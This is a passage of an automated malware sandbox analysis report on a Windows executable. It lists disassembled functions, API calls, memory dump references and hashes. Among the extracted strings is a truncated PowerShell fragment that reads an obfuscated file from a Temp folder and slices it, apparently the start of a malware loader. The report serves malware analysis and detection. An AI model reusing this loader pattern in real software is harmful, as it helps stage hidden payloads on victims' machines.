                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3850602802-0
                                                                                                                          • Opcode ID: 01c1f4f33aac3a691bde0469ce369b5b71776cf29dade69a37d66e4d0fb82d37
                                                                                                                          • Instruction ID: 7bbc1d354ca6a657268cc6ac0e987aef7d9b1e86ba1bc1dada8f70c4162f718e
                                                                                                                          • Opcode Fuzzy Hash: 01c1f4f33aac3a691bde0469ce369b5b71776cf29dade69a37d66e4d0fb82d37
                                                                                                                          • Instruction Fuzzy Hash: B6C04C717402016AEA209B519E49F1677545BA0B40F1584797750E50E4C674D450D62C
                                                                                                                          APIs
                                                                                                                          • SetFilePointer.KERNELBASE(?,00000000,00000000,004030A4,?,?,00000006,00000008,0000000A), ref: 0040331F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FilePointer
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 973152223-0
                                                                                                                          • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                                          • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                                                                                          • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                                          • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(00000028,?,00000001,0040405B), ref: 0040423E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3850602802-0
                                                                                                                          • Opcode ID: 5ca98cf1e0c0583582b159413f58df588980414c8ed315818e52b16ce3e78aaf
                                                                                                                          • Instruction ID: b613885e7b2bd37cd291f1056477dd360c9db9b8968a6fc02a79c1078c08bd5c
                                                                                                                          • Opcode Fuzzy Hash: 5ca98cf1e0c0583582b159413f58df588980414c8ed315818e52b16ce3e78aaf
                                                                                                                          • Instruction Fuzzy Hash: 51B09235280600ABDE214B40DE49F467A62A7B4701F008178B240640B0CAB200A1DB19
                                                                                                                          APIs
                                                                                                                          • ShellExecuteExW.SHELL32(?), ref: 004058BF
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ExecuteShell
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 587946157-0
                                                                                                                          • Opcode ID: 635164c3b06ed96bf07ad63cc2cf624e21a1ddaff933affe27173adac056c9f0
                                                                                                                          • Instruction ID: 322818d701d9cc3fc85427ca8463de8bac6637280c84b784c1803e53dd53602d
                                                                                                                          • Opcode Fuzzy Hash: 635164c3b06ed96bf07ad63cc2cf624e21a1ddaff933affe27173adac056c9f0
                                                                                                                          • Instruction Fuzzy Hash: 55C092B2000200DFE301CF90CB08F067BF8AF59306F028058E1849A160C7788800CB69
                                                                                                                          APIs
                                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,00403FF4), ref: 00404227
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CallbackDispatcherUser
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2492992576-0
                                                                                                                          • Opcode ID: 01955649d6a23d6122fd97f0d30e7ef4bb95205b783011211b5c169bc8d67104
                                                                                                                          • Instruction ID: cd7a90ca9096364f54c072f0977fd0b21683179c1f8a6313e809ce6865a57a73
                                                                                                                          • Opcode Fuzzy Hash: 01955649d6a23d6122fd97f0d30e7ef4bb95205b783011211b5c169bc8d67104
                                                                                                                          • Instruction Fuzzy Hash: AFA01231100400ABCE124F50DF08C09BA31B7B43017104439A1400003086320420EB08
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 004052EC: lstrlenW.KERNEL32(Completed,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000,?), ref: 00405324
                                                                                                                            • Part of subcall function 004052EC: lstrlenW.KERNEL32(0040324F,Completed,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000), ref: 00405334
                                                                                                                            • Part of subcall function 004052EC: lstrcatW.KERNEL32(Completed,0040324F,0040324F,Completed,00000000,00410EA0,004030B0), ref: 00405347
                                                                                                                            • Part of subcall function 004052EC: SetWindowTextW.USER32(Completed,Completed), ref: 00405359
                                                                                                                            • Part of subcall function 004052EC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040537F
                                                                                                                            • Part of subcall function 004052EC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405399
                                                                                                                            • Part of subcall function 004052EC: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A7
                                                                                                                            • Part of subcall function 0040586D: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004266F0,Error launching installer), ref: 00405896
                                                                                                                            • Part of subcall function 0040586D: CloseHandle.KERNEL32(?), ref: 004058A3
                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401F4D
                                                                                                                            • Part of subcall function 0040670F: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406720
                                                                                                                            • Part of subcall function 0040670F: GetExitCodeProcess.KERNEL32(?,?), ref: 00406742
                                                                                                                            • Part of subcall function 004061CB: wsprintfW.USER32 ref: 004061D8
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2972824698-0
                                                                                                                          • Opcode ID: 4bccf259bf579bfc981a9d644e2eeac5cb2ef6dcf81bcc0c58dbcf99a973db51
                                                                                                                          • Instruction ID: 3becab0f16e6f8309876834f620f7dc234fcc10e550b4e4e61bdbb7a81e04ee7
                                                                                                                          • Opcode Fuzzy Hash: 4bccf259bf579bfc981a9d644e2eeac5cb2ef6dcf81bcc0c58dbcf99a973db51
                                                                                                                          • Instruction Fuzzy Hash: 3EF09632905011DBCB20FBA1894459F76A49F00318B2445BBF902B21D1C77D0E519A6E
                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404C80
                                                                                                                          • GetDlgItem.USER32(?,00000408), ref: 00404C8B
                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404CD5
                                                                                                                          • LoadBitmapW.USER32(0000006E), ref: 00404CE8
                                                                                                                          • SetWindowLongW.USER32(?,000000FC,00405260), ref: 00404D01
                                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D15
                                                                                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D27
                                                                                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404D3D
                                                                                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D49
                                                                                                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D5B
                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00404D5E
                                                                                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D89
                                                                                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D95
                                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E2B
                                                                                                                          • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E56
                                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E6A
                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404E99
                                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EA7
                                                                                                                          • ShowWindow.USER32(?,00000005), ref: 00404EB8
                                                                                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FB5
                                                                                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040501A
                                                                                                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040502F
                                                                                                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405053
                                                                                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405073
                                                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 00405088
                                                                                                                          • GlobalFree.KERNEL32(?), ref: 00405098
                                                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405111
                                                                                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 004051BA
                                                                                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051C9
                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 004051E9
                                                                                                                          • ShowWindow.USER32(?,00000000), ref: 00405237
                                                                                                                          • GetDlgItem.USER32(?,000003FE), ref: 00405242
                                                                                                                          • ShowWindow.USER32(00000000), ref: 00405249
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                          • String ID: $M$N
                                                                                                                          • API String ID: 1638840714-813528018
                                                                                                                          • Opcode ID: db838c6bb8d772e12c4665b4b5b4d6ec78d20dbcb7ff8c3e764052d6be2fe8db
                                                                                                                          • Instruction ID: eb67e1f84f539b9e971c37d3801f2636e85636a2c3494a43e8d053fef61581d0
                                                                                                                          • Opcode Fuzzy Hash: db838c6bb8d772e12c4665b4b5b4d6ec78d20dbcb7ff8c3e764052d6be2fe8db
                                                                                                                          • Instruction Fuzzy Hash: E6027EB0A00209EFDB209F55CD45AAE7BB9FB44314F10857AF610BA2E1C7799E52CF58
                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32(?,000003FB), ref: 0040473B
                                                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 00404765
                                                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 00404816
                                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404821
                                                                                                                          • lstrcmpiW.KERNEL32(: Completed,004236E8,00000000,?,?), ref: 00404853
                                                                                                                          • lstrcatW.KERNEL32(?,: Completed), ref: 0040485F
                                                                                                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404871
                                                                                                                            • Part of subcall function 004058CE: GetDlgItemTextW.USER32(?,?,00000400,004048A8), ref: 004058E1
                                                                                                                            • Part of subcall function 00406518: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\TjoY7n65om.exe",00403334,C:\Users\user\AppData\Local\Temp\,774D3420,004035A3,?,00000006,00000008,0000000A), ref: 0040657B
                                                                                                                            • Part of subcall function 00406518: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040658A
                                                                                                                            • Part of subcall function 00406518: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\TjoY7n65om.exe",00403334,C:\Users\user\AppData\Local\Temp\,774D3420,004035A3,?,00000006,00000008,0000000A), ref: 0040658F
                                                                                                                            • Part of subcall function 00406518: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\TjoY7n65om.exe",00403334,C:\Users\user\AppData\Local\Temp\,774D3420,004035A3,?,00000006,00000008,0000000A), ref: 004065A2
                                                                                                                          • GetDiskFreeSpaceW.KERNEL32(004216B8,?,?,0000040F,?,004216B8,004216B8,?,00000001,004216B8,?,?,000003FB,?), ref: 00404934
                                                                                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040494F
                                                                                                                            • Part of subcall function 00404AA8: lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B49
                                                                                                                            • Part of subcall function 00404AA8: wsprintfW.USER32 ref: 00404B52
                                                                                                                            • Part of subcall function 00404AA8: SetDlgItemTextW.USER32(?,004236E8), ref: 00404B65
                                                                                                                          Strings
                                                                                                                          • A, xrefs: 0040480F
                                                                                                                          • 6B, xrefs: 004047E9
                                                                                                                          • "$Fuffy=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\depersonaliseredes\Thalamiflorous.Tus209';$Antigenes=$Fuffy.SubString(5, xrefs: 00404705
                                                                                                                          • : Completed, xrefs: 0040484D, 00404852, 0040485D
                                                                                                                          • C:\Users\user\AppData\Local\Temp\depersonaliseredes, xrefs: 0040483C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                          • String ID: "$Fuffy=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\depersonaliseredes\Thalamiflorous.Tus209';$Antigenes=$Fuffy.SubString(5$: Completed$A$C:\Users\user\AppData\Local\Temp\depersonaliseredes$6B
                                                                                                                          • API String ID: 2624150263-1147956729
                                                                                                                          • Opcode ID: 1856695c990301f96b0bfae571b3bc84039281bd83faa45955c02c51b4778447
                                                                                                                          • Instruction ID: 1fca52776cba06a1556b538b397dade1a16f07a9c9d6655049f3c7fe444e155e
                                                                                                                          • Opcode Fuzzy Hash: 1856695c990301f96b0bfae571b3bc84039281bd83faa45955c02c51b4778447
                                                                                                                          • Instruction Fuzzy Hash: B4A180F1A00209ABDB11AFA6CD45AAF77B8EF84714F10843BF601B62D1D77C99418B6D
                                                                                                                          APIs
                                                                                                                          • DeleteFileW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\,774D3420,00000000), ref: 004059BF
                                                                                                                          • lstrcatW.KERNEL32(004256F0,\*.*,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,774D3420,00000000), ref: 00405A07
                                                                                                                          • lstrcatW.KERNEL32(?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,774D3420,00000000), ref: 00405A2A
                                                                                                                          • lstrlenW.KERNEL32(?,?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,774D3420,00000000), ref: 00405A30
                                                                                                                          • FindFirstFileW.KERNEL32(004256F0,?,?,?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,774D3420,00000000), ref: 00405A40
                                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AE0
                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00405AEF
                                                                                                                          Strings
                                                                                                                          • "C:\Users\user\Desktop\TjoY7n65om.exe", xrefs: 00405996
                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004059A4
                                                                                                                          • \*.*, xrefs: 00405A01
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                          • String ID: "C:\Users\user\Desktop\TjoY7n65om.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                          • API String ID: 2035342205-436228452
                                                                                                                          • Opcode ID: d3b1db4ec6e858d6de83fe0182b98463dfe8c84cfbcf579265b0cac0546164ac
                                                                                                                          • Instruction ID: c51eb27d53b6fe35fd8e31d26e19e594c53701a60ebafcf50548af423f91ca56
                                                                                                                          • Opcode Fuzzy Hash: d3b1db4ec6e858d6de83fe0182b98463dfe8c84cfbcf579265b0cac0546164ac
                                                                                                                          • Instruction Fuzzy Hash: 0641B530A00914AACB21BB658C89BAF7778EF45729F60427FF801711D1D7BC5981DEAE
                                                                                                                          APIs
                                                                                                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404458
                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 0040446C
                                                                                                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404489
                                                                                                                          • GetSysColor.USER32(?), ref: 0040449A
                                                                                                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044A8
                                                                                                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044B6
                                                                                                                          • lstrlenW.KERNEL32(?), ref: 004044BB
                                                                                                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044C8
                                                                                                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044DD
                                                                                                                          • GetDlgItem.USER32(?,0000040A), ref: 00404536
                                                                                                                          • SendMessageW.USER32(00000000), ref: 0040453D
                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 00404568
                                                                                                                          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045AB
                                                                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 004045B9
                                                                                                                          • SetCursor.USER32(00000000), ref: 004045BC
                                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 004045D5
                                                                                                                          • SetCursor.USER32(00000000), ref: 004045D8
                                                                                                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404607
                                                                                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404619
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
